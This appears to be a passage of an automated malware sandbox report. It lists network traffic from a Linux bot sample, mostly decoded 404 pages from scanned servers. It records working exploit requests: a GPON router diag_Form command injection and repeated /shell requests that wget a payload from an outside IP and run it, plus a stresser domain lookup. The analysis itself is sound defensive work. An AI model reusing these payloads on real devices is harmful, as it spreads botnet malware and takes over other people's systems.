Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 14:40:21 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:05:39 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 148Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 53 6f 72 72 79 21 3c 2f 68 31 3e 3c 6c 61 62 65 6c 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 64 61 72 6b 73 6c 61 74 65 67 72 65 79 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 63 75 72 73 69 76 65 3b 22 3e 4e 54 68 65 20 70 61 67 65 20 79 6f 75 20 77 65 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 3c 2f 6c 61 62 65 6c 3e 3c 2f 63 65 6e 74 65 72 3e Data Ascii: <center><h1>Sorry!</h1><label style="color: darkslategrey;font-family: cursive;">NThe page you were looking for could not be found.</label></center>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:23 GMTServer: ApacheContent-Length: 255Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:24 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:24 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 42X-Varnish: 65793091X-Robots-Tag: noindex, nofollowServer: MIVia: 1.1 miMI-Cache-Age: 0Connection: keep-aliveData Raw: 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e Data Ascii: The requested resource could not be found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:24 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 1699Keep-Alive: timeout=5Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-Frame-Options: SAMEORIGINStatus: 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheTransfer-Encoding: chunkedCONTENT-LANGUAGE: enDate: Mon, 01 Nov 2021 09:10:24 GMTServer: lighttpd/1.4.39Data Raw: 30 66 30 66 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 69 6e 6b 73 79 73 20 53 6d 61 72 74 20 57 69 2d 46 69 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 21 2d 2d 62 69 67 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 21 2d 2d 42 45 47 49 4e 5f 43 4f 4d 42 49 4e 45 44 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 72 65 73 65 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 6f 6e 6e 65 63 74 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 61 70 70 6c 65 74 2d 75 69 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 76 61 6c 69 64 61 74 69 6f 6e 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 75 69 2f 31 2e 30 2e 39 39 2e 31 39 36 34 30 30 2f 73 74 61 74 69 63 2f 63 61 63 68 65 2f 63 73 73 2f 63 68 65 63 6b 62 6f 78 2d 72 61 64 69 6f 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:26 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:10:26 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:10:27 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:59 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>

Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://49.12.233.52/bin
Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 9o6Z1wEokT	String found in binary or memory: http://upx.sf.net

Source: unknown

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://49.12.233.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

Source: unknown

DNS traffic detected: queries for: scamanje.stresserit.pro

Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
